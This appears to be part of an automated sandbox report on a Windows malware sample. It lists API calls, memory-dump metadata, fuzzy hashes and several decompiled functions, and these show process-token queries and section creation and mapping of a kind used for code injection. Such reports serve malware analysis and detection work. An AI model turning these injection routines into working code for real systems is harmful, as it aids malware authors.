                                • Part of subcall function 013E55DC: RtlAllocateHeap.NTDLL(00000000,00000000,013E552C), ref: 013E55E8
                              • lstrcpy.KERNEL32(00000000,03AD9B58), ref: 013E6F99
                              • lstrcat.KERNEL32(00000000,?), ref: 013E6FA4
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                              • String ID:
                              • API String ID: 74227042-0
                              • Opcode ID: 6b4a898d45f0a3ec1e458289dc2d4411804295fa4a064c687f5d69ad0182cfbb
                              • Instruction ID: 7be41db40f3975574d433ca06634604a3c4e0fc698fb21ee50a4a102f2c239b3
                              • Opcode Fuzzy Hash: 6b4a898d45f0a3ec1e458289dc2d4411804295fa4a064c687f5d69ad0182cfbb
                              • Instruction Fuzzy Hash: 46E06D73501325ABC6319BE8AC48C9FBBEDEF9A725B040416F600D7144C724CC098BA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Executed Functions

                              APIs
                              • RtlInitializeCriticalSection.NTDLL(053F0488), ref: 053C4DB3
                                • Part of subcall function 053D032D: RtlAllocateHeap.NTDLL(00000000,?,053E24D0), ref: 053D0339
                              • memset.NTDLL ref: 053C4DE4
                              • RtlInitializeCriticalSection.NTDLL(064FC0A0), ref: 053C4DF5
                                • Part of subcall function 053E45CE: RtlInitializeCriticalSection.NTDLL(053F0460), ref: 053E45F2
                                • Part of subcall function 053E45CE: RtlInitializeCriticalSection.NTDLL(053F0440), ref: 053E4608
                                • Part of subcall function 053E45CE: GetVersion.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,053D940A,?,?,?), ref: 053E4619
                                • Part of subcall function 053E45CE: GetModuleHandleA.KERNEL32(00001597,?,00000000,?,?,?,?,?,?,?,?,?,053D940A,?,?,?), ref: 053E464D
                                • Part of subcall function 053D465E: RtlAllocateHeap.NTDLL(00000000,-00000003,77E49EB0), ref: 053D4678
                              • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000060,?,00000000,?,?,?,?,?,?,?,?,?,053D940A), ref: 053C4E1E
                              • GetLastError.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,053D940A,?,?,?), ref: 053C4E2F
                              • CloseHandle.KERNEL32(000007D0,?,00000000,?,?,?,?,?,?,?,?,?,053D940A,?,?,?), ref: 053C4E43
                              • GetUserNameA.ADVAPI32(00000000,?), ref: 053C4E8C
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 053C4E9F
                              • GetUserNameA.ADVAPI32(00000000,?), ref: 053C4EB4
                              • NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 053C4EE4
                              • OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,053D940A,?), ref: 053C4EF9
                              • GetLastError.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,053D940A,?,?,?), ref: 053C4F03
                              • CloseHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,053D940A,?,?,?), ref: 053C4F10
                              • GetShellWindow.USER32 ref: 053C4F2B
                              • GetWindowThreadProcessId.USER32(00000000), ref: 053C4F32
                              • memcpy.NTDLL(053F0354,?,00000018,?,00000000,?,?,?,?,?,?,?,?,?,053D940A,?), ref: 053C4F6E
                              • CreateEventA.KERNEL32(053F0244,00000001,00000000,00000000,?,00000001,?,00000000), ref: 053C4FEC
                              • RtlAllocateHeap.NTDLL(00000000,00000018,?), ref: 053C5016
                              • OpenEventA.KERNEL32(00100000,00000000,064FB9D0,?,00000000,?,?,?,?,?,?,?,?,?,053D940A,?), ref: 053C503E
                              • CreateEventA.KERNEL32(053F0244,00000001,00000000,064FB9D0,?,00000000,?,?,?,?,?,?,?,?,?,053D940A), ref: 053C5053
                              • GetLastError.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,053D940A,?,?,?), ref: 053C5059
                              • LoadLibraryA.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,053D940A,?,?,?), ref: 053C50F1
                              • SetEvent.KERNEL32(?,Function_000115C8,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,053D940A), ref: 053C5187
                              • RtlAllocateHeap.NTDLL(00000000,00000043,Function_000115C8), ref: 053C519C
                              • wsprintfA.USER32 ref: 053C51CC
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: AllocateHeap$CriticalEventInitializeSection$CreateErrorHandleLastProcess$CloseNameOpenUserWindow$InformationLibraryLoadModuleMutexQueryShellThreadVersionmemcpymemsetwsprintf
                              • String ID:
                              • API String ID: 3929413950-0
                              • Opcode ID: ea2d65899f7905b11e5396d028a872c060c9a335e15c8944e7628862ae799b39
                              • Instruction ID: 8424f49a1029061c6a5a00b30e9a9ed004d94f9b26249982cb52208c3e7b370f
                              • Opcode Fuzzy Hash: ea2d65899f7905b11e5396d028a872c060c9a335e15c8944e7628862ae799b39
                              • Instruction Fuzzy Hash: 2AC188B5624305AFCB24DF69E84E92BBFE9FB85701F40485EF5478B241DBB1A804CB61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • StrRChrA.SHLWAPI(064FB5B0,00000000,0000005C,?,?,?), ref: 053D9332
                              • _strupr.NTDLL ref: 053D9348
                              • lstrlen.KERNEL32(064FB5B0,?,?), ref: 053D9350
                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?), ref: 053D93D0
                              • RtlAddVectoredExceptionHandler.NTDLL(00000000,053D37EE), ref: 053D93F7
                              • GetLastError.KERNEL32(?,?), ref: 053D9411
                              • RtlRemoveVectoredExceptionHandler.NTDLL(04AD05B8), ref: 053D9427
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: ExceptionHandlerVectored$CreateErrorEventLastRemove_struprlstrlen
                              • String ID:
                              • API String ID: 2251957091-0
                              • Opcode ID: ff557889cffb44f938ef909eeeb7cee59ec1e6afc9e8ee30869a4f257de20770
                              • Instruction ID: 6b42c0d00c349012bb9980e1db996b729e9d0d42f743f582085c00bb75bd4a15
                              • Opcode Fuzzy Hash: ff557889cffb44f938ef909eeeb7cee59ec1e6afc9e8ee30869a4f257de20770
                              • Instruction Fuzzy Hash: 0D31D173A141209FDB259BB8FC8EA7EBFBDB704714F450529F913EB182DA7099408760
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 38%
                              			E049D6C06(char _a4, void* _a8) {
                              				void* _v8;
                              				void* _v12;
                              				char _v16;
                              				void* _v20;
                              				char _v24;
                              				char _v28;
                              				char _v32;
                              				char _v36;
                              				char _v40;
                              				void* _v44;
                              				void** _t33;
                              				void* _t40;
                              				void* _t43;
                              				void** _t44;
                              				intOrPtr* _t47;
                              				char _t48;
                              
                              				asm("stosd");
                              				asm("stosd");
                              				asm("stosd");
                              				asm("stosd");
                              				asm("stosd");
                              				_v20 = _a4;
                              				_t48 = 0;
                              				_v16 = 0;
                              				_a4 = 0;
                              				_v44 = 0x18;
                              				_v40 = 0;
                              				_v32 = 0;
                              				_v36 = 0;
                              				_v28 = 0;
                              				_v24 = 0;
                              				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                              					_t33 =  &_v8;
                              					__imp__(_v12, 8, _t33);
                              					if(_t33 >= 0) {
                              						_t47 = __imp__;
                              						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                              						_t44 = E049D55DC(_a4);
                              						if(_t44 != 0) {
                              							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                              							if(_t40 >= 0) {
                              								memcpy(_a8,  *_t44, 0x1c);
                              								_t48 = 1;
                              							}
                              							E049D6DFA(_t44);
                              						}
                              						NtClose(_v8); // executed
                              					}
                              					NtClose(_v12);
                              				}
                              				return _t48;
                              			}

                              APIs
                              • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 049D6C4D
                              • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 049D6C60
                              • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 049D6C7C
                                • Part of subcall function 049D55DC: RtlAllocateHeap.NTDLL(00000000,00000000,049D552C), ref: 049D55E8
                              • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 049D6C99
                              • memcpy.NTDLL(?,00000000,0000001C), ref: 049D6CA6
                              • NtClose.NTDLL(?), ref: 049D6CB8
                              • NtClose.NTDLL(00000000), ref: 049D6CC2
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                              • String ID:
                              • API String ID: 2575439697-0
                              • Opcode ID: 8992affb6f8b6baa22f21546e68c4479d8a7230bb9457cdcd5829e377fc6676c
                              • Instruction ID: 7c0b56072dbe3803e12f0f368fb748ad103635dd926dbacdf058f069c2f84c97
                              • Opcode Fuzzy Hash: 8992affb6f8b6baa22f21546e68c4479d8a7230bb9457cdcd5829e377fc6676c
                              • Instruction Fuzzy Hash: 4E212872900228BFDB019FA5DC45DDEBFBDEF48754F108022FA05E6110D7719A44DBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 053CB0EC
                              • NtOpenProcessToken.NTDLL(?,00000008,?), ref: 053CB0FF
                              • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,?), ref: 053CB11B
                                • Part of subcall function 053D032D: RtlAllocateHeap.NTDLL(00000000,?,053E24D0), ref: 053D0339
                              • NtQueryInformationToken.NTDLL(?,00000001,00000000,?,?), ref: 053CB138
                              • memcpy.NTDLL(?,00000000,0000001C), ref: 053CB145
                              • NtClose.NTDLL(?), ref: 053CB157
                              • NtClose.NTDLL(?), ref: 053CB161
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                              • String ID:
                              • API String ID: 2575439697-0
                              • Opcode ID: 5698662d1410b0d66cf2e5a89a4bd9a1f10112de5ab0ceeb8455f7d8b1d1a53f
                              • Instruction ID: 6ce940c8fa6097ced3e01c46bc9a68abf422d4449afb33f38ba5ca4d939592d3
                              • Opcode Fuzzy Hash: 5698662d1410b0d66cf2e5a89a4bd9a1f10112de5ab0ceeb8455f7d8b1d1a53f
                              • Instruction Fuzzy Hash: 6C21FA72A10219BBDB11AF95DC4AADEBFBDEF08740F104066F905FA250D7729A449BA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetSystemTimeAsFileTime.KERNEL32(?), ref: 053DDA1F
                              • HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 053DDA2C
                              • NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 053DDAB8
                              • GetModuleHandleA.KERNEL32(00000000), ref: 053DDAC3
                              • RtlImageNtHeader.NTDLL(00000000), ref: 053DDACC
                              • RtlExitUserThread.NTDLL(00000000), ref: 053DDAE1
                                • Part of subcall function 053D22F0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,053DDA5A,?), ref: 053D22F8
                                • Part of subcall function 053D22F0: GetVersion.KERNEL32 ref: 053D2307
                                • Part of subcall function 053D22F0: GetCurrentProcessId.KERNEL32 ref: 053D231E
                                • Part of subcall function 053D22F0: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 053D233B
                                • Part of subcall function 053CE0B6: memcpy.NTDLL(00000000,?,?,?), ref: 053CE115
                                • Part of subcall function 053E4BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,053C3E20), ref: 053E4BF0
                                • Part of subcall function 053C54B6: GetModuleHandleA.KERNEL32(?,053F01F4,?,?,?,053D3B88,00000000,053F01F4,?,00000000), ref: 053C54D7
                                • Part of subcall function 053C54B6: GetProcAddress.KERNEL32(00000000,?), ref: 053C54F0
                                • Part of subcall function 053C54B6: OpenProcess.KERNEL32(00000400,00000000,053D3B88,053F01F4,?,?,?,053D3B88,00000000,053F01F4,?,00000000), ref: 053C550D
                                • Part of subcall function 053C54B6: IsWow64Process.KERNEL32(00000000,00000000,053F01F4,?,?,?,053D3B88,00000000,053F01F4,?,00000000), ref: 053C551E
                                • Part of subcall function 053C54B6: CloseHandle.KERNEL32(00000000,?,?,053D3B88,00000000,053F01F4,?,00000000), ref: 053C5531
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Process$HandleModule$CreateFileOpenThreadTime$AddressCloseCurrentEventExitHeaderHeapImageInformationNameProcQuerySystemUserVersionWow64memcpy
                              • String ID:
                              • API String ID: 3675227105-0
                              • Opcode ID: 8336cc941be8d0fa346ecff513aee9b7043b07ffacf0bcfd9f0969680689dd9b
                              • Instruction ID: 4106e4439f3e665b29f6efff44e2ec54cf8b08a4a76c0fc2485281ce0ce6a9a4
                              • Opcode Fuzzy Hash: 8336cc941be8d0fa346ecff513aee9b7043b07ffacf0bcfd9f0969680689dd9b
                              • Instruction Fuzzy Hash: F7318672A14114AFC721EF64EC89EBEBBB9FB44750F148565F502EF241DA789D40C760
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • memcpy.NTDLL(053D3C59,053C6017,00000800,053D3C99,053D3C99,?,00000000), ref: 053CD78F
                                • Part of subcall function 053C9704: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,?,053CD660,?,?,053D3C99,?,00000000), ref: 053C9729
                                • Part of subcall function 053C9704: GetProcAddress.KERNEL32(00000000,?), ref: 053C974B
                                • Part of subcall function 053C9704: GetProcAddress.KERNEL32(00000000,?), ref: 053C9761
                                • Part of subcall function 053C9704: GetProcAddress.KERNEL32(00000000,?), ref: 053C9777
                                • Part of subcall function 053C9704: GetProcAddress.KERNEL32(00000000,?), ref: 053C978D
                                • Part of subcall function 053C9704: GetProcAddress.KERNEL32(00000000,?), ref: 053C97A3
                                • Part of subcall function 053C3EB7: NtMapViewOfSection.NTDLL(00000000,000000FF,053D96AE,00000000,00000000,053D96AE,?,00000002,00000000,?,?,00000000,053D96AE,000000FF,?), ref: 053C3EE5
                                • Part of subcall function 053E5F28: memcpy.NTDLL(575653E8,575653F0,?,?,053D3C99,?,?,?,?,?,053D3C99,?,00000000), ref: 053E5F8E
                                • Part of subcall function 053E5F28: memcpy.NTDLL(?,?,?), ref: 053E5FED
                              • memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,053D3C99,?,00000000), ref: 053CD6BF
                              • memcpy.NTDLL(053D3CB1,?,00000018,?,?,?,?,?,?,?,053D3C99,?,00000000), ref: 053CD70B
                              • NtUnmapViewOfSection.NTDLL(000000FF,00000000,?,00000000), ref: 053CD7CD
                              • memset.NTDLL ref: 053CD7F5
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: AddressProcmemcpy$SectionView$HandleModuleUnmapmemset
                              • String ID:
                              • API String ID: 1575695328-0
                              • Opcode ID: f80640fe5dc66fdf6764134b33ec2d006c29c5f0f333260195c0f92a84f5ab55
                              • Instruction ID: 1a9b7711012163a85f82d07ffa0a4e194302af1978b3e8f86d57d21004f40520
                              • Opcode Fuzzy Hash: f80640fe5dc66fdf6764134b33ec2d006c29c5f0f333260195c0f92a84f5ab55
                              • Instruction Fuzzy Hash: AD9139B5A00249EFCB11DF98C984BAEBBF5FF08304F1449ADE815A7650E771AE54CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtCreateSection.NTDLL(053D3C99,000F001F,?,?,?,08000000,00000000,74784EE0,00000000,00000000), ref: 053D9697
                                • Part of subcall function 053C3EB7: NtMapViewOfSection.NTDLL(00000000,000000FF,053D96AE,00000000,00000000,053D96AE,?,00000002,00000000,?,?,00000000,053D96AE,000000FF,?), ref: 053C3EE5
                              • memset.NTDLL ref: 053D96BB
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Section$CreateViewmemset
                              • String ID: @
                              • API String ID: 2533685722-2766056989
                              • Opcode ID: c8d4de2ac11249e1ae9eabbe1a4e3da229fd7d78a7802e593786f5aabba29f71
                              • Instruction ID: dee23430116bd53926aca90c895c1b4d02a717fa68ec73b376c4fb172a92c24a
                              • Opcode Fuzzy Hash: c8d4de2ac11249e1ae9eabbe1a4e3da229fd7d78a7802e593786f5aabba29f71
                              • Instruction Fuzzy Hash: 06213BB2D00209AFCB01DFA9C8849EEFBB9EF08364F104529E515F3650D7319A448B64
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetProcAddress.KERNEL32(?,00000318), ref: 053E67F2
                              • NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 053E680E
                                • Part of subcall function 053D032D: RtlAllocateHeap.NTDLL(00000000,?,053E24D0), ref: 053D0339
                                • Part of subcall function 053D1635: GetProcAddress.KERNEL32(?,00000000), ref: 053D165E
                                • Part of subcall function 053D1635: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,053E684F,00000000,00000000,00000028,00000100), ref: 053D1680
                              • StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 053E6978
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: AddressProcWow64$AllocateHeapInformationMemory64Process64QueryReadVirtual
                              • String ID:
                              • API String ID: 3547194813-0
                              • Opcode ID: 22988fbaf9e1605798418f7d62f34c165cd31ce3ac64aae0d0b8d8cceeb97ca1
                              • Instruction ID: 76cd63cf366cc42b4aba6daa3eca007e9374863a2a7231f248ab548061d3ea18
                              • Opcode Fuzzy Hash: 22988fbaf9e1605798418f7d62f34c165cd31ce3ac64aae0d0b8d8cceeb97ca1
                              • Instruction Fuzzy Hash: 7F614F71A0021AAFDF14CFA5D981BAEBBF5FF18300F144129E955EB281D770EA55CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • memset.NTDLL ref: 053DC52F
                              • GetProcAddress.KERNEL32(?), ref: 053DC557
                              • NtWow64QueryInformationProcess64.NTDLL(?,00000000,?,00000030,00000000,?,00001000,00000000), ref: 053DC575
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: AddressInformationProcProcess64QueryWow64memset
                              • String ID:
                              • API String ID: 2968673968-0
                              • Opcode ID: d25e7f07ca612dacec48a4d9ee30efce1217530ac3619d83c47911270a6b462a
                              • Instruction ID: 8bd66b333051ea0eb95538b8c0708c266c38a77333dab9e6bf6bc6dd1b7c886c
                              • Opcode Fuzzy Hash: d25e7f07ca612dacec48a4d9ee30efce1217530ac3619d83c47911270a6b462a
                              • Instruction Fuzzy Hash: F0113D32A20119AFDB14DB99EC49F9DBBB9BB45744F040025B905EB291EB70EA05CBB0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtAllocateVirtualMemory.NTDLL(053CC119,00000000,00000000,053CC119,00003000,00000040), ref: 053D09FB
                              • RtlNtStatusToDosError.NTDLL(00000000), ref: 053D0A02
                              • SetLastError.KERNEL32(00000000), ref: 053D0A09
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Error$AllocateLastMemoryStatusVirtual
                              • String ID:
                              • API String ID: 722216270-0
                              • Opcode ID: 6d5d1fb70f9bde219a2ec25e150819e02b3ae3bc5fd54315dc442d868604fba7
                              • Instruction ID: 92ff5c7d9b566554a895fdd51fe96d4a4d70b6249009d530aedd6de652301910
                              • Opcode Fuzzy Hash: 6d5d1fb70f9bde219a2ec25e150819e02b3ae3bc5fd54315dc442d868604fba7
                              • Instruction Fuzzy Hash: 9AF0F471521309FBEB15CF94D95EF9DBBBCAB14715F104048B501AA1C0EBB8AB04D765
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • NtWriteVirtualMemory.NTDLL(?,00000004,?,?,?,74786780,?,053DFDBE,?,00000004,?,00000004,?), ref: 053E5008
                              • RtlNtStatusToDosError.NTDLL(C0000002), ref: 053E5017
                              • SetLastError.KERNEL32(00000000,?,053DFDBE,?,00000004,?,00000004,?,?,?,?,053D3C11,?,?,CCCCFEEB,?), ref: 053E501E
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Error$LastMemoryStatusVirtualWrite
                              • String ID:
                              • API String ID: 1089604434-0
                              • Opcode ID: 23214b8978201f8c7ca56cc3769f5e81312f6596ed54a47cdbc07d60865fdcd3
                              • Instruction ID: bd2666cb1dee6897b05d826ba8b5d370332b21f472a5b3c610de7ef7afa6b7fc
                              • Opcode Fuzzy Hash: 23214b8978201f8c7ca56cc3769f5e81312f6596ed54a47cdbc07d60865fdcd3
                              • Instruction Fuzzy Hash: 79E0123221012AABCF125ED49D09D8E7FDDAB08751F004010BA01DA151CB35D861ABE0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 72%
                              			E049D7562(intOrPtr* __eax, void** _a4) {
                              				int _v12;
                              				void* _v16;
                              				void* _v20;
                              				void* _v24;
                              				int _v28;
                              				int _v32;
                              				intOrPtr _v36;
                              				int _v40;
                              				int _v44;
                              				void* _v48;
                              				void* __esi;
                              				long _t34;
                              				void* _t39;
                              				void* _t47;
                              				intOrPtr* _t48;
                              
                              				_t48 = __eax;
                              				asm("stosd");
                              				asm("stosd");
                              				asm("stosd");
                              				asm("stosd");
                              				asm("stosd");
                              				asm("stosd");
                              				_v24 =  *((intOrPtr*)(__eax + 4));
                              				_v16 = 0;
                              				_v12 = 0;
                              				_v48 = 0x18;
                              				_v44 = 0;
                              				_v36 = 0x40;
                              				_v40 = 0;
                              				_v32 = 0;
                              				_v28 = 0;
                              				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                              				if(_t34 < 0) {
                              					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
                              				} else {
                              					 *_t48 = _v16;
                              					_t39 = E049D65B4(_t48,  &_v12); // executed
                              					_t47 = _t39;
                              					if(_t47 != 0) {
                              						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
                              					} else {
                              						memset(_v12, 0, _v24);
                              						 *_a4 = _v12;
                              					}
                              				}
                              				return _t47;
                              			}

                              APIs
                              • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74784EE0,00000000,00000000,049D6DA4), ref: 049D75BF
                                • Part of subcall function 049D65B4: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,049D75D4,00000002,00000000,?,?,00000000,?,?,049D75D4,00000000), ref: 049D65E1
                              • memset.NTDLL ref: 049D75E1
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: Section$CreateViewmemset
                              • String ID:
                              • API String ID: 2533685722-0
                              • Opcode ID: 7b17b77b2f6c88aa2ae40b1cc99be76bae56fb1d76c391742396b67112d96bb9
                              • Instruction ID: 82aab2f71accfbc2e548d50acb789f5913c6d5b3e030e2e07b9fd0bf2754f584
                              • Opcode Fuzzy Hash: 7b17b77b2f6c88aa2ae40b1cc99be76bae56fb1d76c391742396b67112d96bb9
                              • Instruction Fuzzy Hash: 71210BB5D00209AFDB11DFA9C8849DEFBB9EB48354F108879E605F3210D731AA448BA5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetProcAddress.KERNEL32(?,00000000), ref: 053D165E
                              • NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,053E684F,00000000,00000000,00000028,00000100), ref: 053D1680
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: AddressMemory64ProcReadVirtualWow64
                              • String ID:
                              • API String ID: 752694512-0
                              • Opcode ID: c6707dc516c360aab3609061ed625cfcdaee51289fd099e85f1b8c7932e1197b
                              • Instruction ID: 9ce18ce0678e3aa7d19db55a1a536f76fa68ad181fdc72ce3722bb935c1d89dd
                              • Opcode Fuzzy Hash: c6707dc516c360aab3609061ed625cfcdaee51289fd099e85f1b8c7932e1197b
                              • Instruction Fuzzy Hash: 5CF04472210109BFCB068F8AEC49C9EBFBEFB84350B04401AF905CA120DBB1EA50DB30
                               Uniqueness
                               • Uniqueness Score: -1.00%
                              C-Code - Quality: 68%
                               			E049D65B4(void** __esi, PVOID* _a4) {
                               				long _v8;
                               				void* _v12;
                               				void* _v16;
                               				long _t13;
                               
                               				_v16 = 0;
                               				asm("stosd");
                               				_v8 = 0;
                               				// NtMapViewOfSection(SectionHandle, ProcessHandle, BaseAddress, ZeroBits, CommitSize,
                               				//                    SectionOffset, ViewSize, InheritDisposition, AllocationType, Win32Protect)
                               				// ProcessHandle is -1 (the calling process), ViewSize 0 maps the whole section from offset 0,
                               				// InheritDisposition 2 is ViewUnmap; the page protection comes from the caller's context (__esi[2]).
                               				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
                               				if(_t13 < 0) {
                               					// NTSTATUS failure: the status is handed to the error callback stored at __esi[6]
                               					_push(_t13);
                               					return __esi[6]();
                               				}
                               				return 0;
                               			}
                               Instruction addresses for the statements above, in order (0x00000000 marks a line with no code):
                               0x049d65c6, 0x049d65cc, 0x049d65da, 0x049d65e1, 0x049d65e6, 0x049d65ec, 0x00000000, 0x049d65ed, 0x00000000

                              APIs
                              • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,049D75D4,00000002,00000000,?,?,00000000,?,?,049D75D4,00000000), ref: 049D65E1
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                               • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp
                               • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp
                               • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp
                               • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: SectionView
                              • String ID:
                              • API String ID: 1323581903-0
                              • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                              • Instruction ID: 4c1391f617d3c1be52198eedfd0c4c7d9e50065c8d58fce37eba6db2a1bae30c
                              • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                              • Instruction Fuzzy Hash: C1F012B590020CBFDB119FA5CC85C9FBBBDEB44354F108939F152E1094D631AE489A60
                               Uniqueness
                               • Uniqueness Score: -1.00%
                              APIs
                              • NtMapViewOfSection.NTDLL(00000000,000000FF,053D96AE,00000000,00000000,053D96AE,?,00000002,00000000,?,?,00000000,053D96AE,000000FF,?), ref: 053C3EE5
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: SectionView
                              • String ID:
                              • API String ID: 1323581903-0
                              • Opcode ID: 2cd136b18fd47c29f94374b8f148c9a9c123cd50275110905b50dafc155aad11
                              • Instruction ID: 05aa91cbe2e8b60658d0035be59f3279197a2d990c85e4e86d4e417fa825349e
                              • Opcode Fuzzy Hash: 2cd136b18fd47c29f94374b8f148c9a9c123cd50275110905b50dafc155aad11
                              • Instruction Fuzzy Hash: 97F012B690020CFFDB119FA5CC85CDFBFBDEB48284B008C6AF552D2450D6719E189B60
                               Uniqueness
